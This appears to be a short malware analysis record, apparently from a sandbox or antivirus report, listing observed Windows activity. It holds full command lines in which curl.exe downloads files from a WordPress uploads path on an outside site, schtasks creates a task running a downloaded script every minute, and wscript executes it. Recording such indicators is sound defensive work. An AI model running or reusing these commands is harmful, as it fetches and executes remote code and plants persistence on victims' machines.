Technical Information
- <SYSTEM32>\tasks\6gd9ipkbw
- '<SYSTEM32>\curl.exe' -sL -o qv4gfhkxqfjfqp.js https://www.entrepreneurshipvillage.com/wp-content/uploads/2021/02/unspectacularvM84Z.php
- '<SYSTEM32>\curl.exe' -s -o fjoe255eiahb -L https://www.entrepreneurshipvillage.com/wp-content/uploads/2021/02/brahmachariN6lXL.php
- '<SYSTEM32>\schtasks.exe' /create /sc minute /f /mo 1 /tr "wscript %ALLUSERSPROFILE%\qv4gfhkxqfjfqp.js 6gd9ipkbw" /tn 6gd9ipkbw
- 'en######neurshipvillage.com':443
- DNS ASK en######neurshipvillage.com
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\qv4gfhkxqfjfqp.js 6gd9ipkbw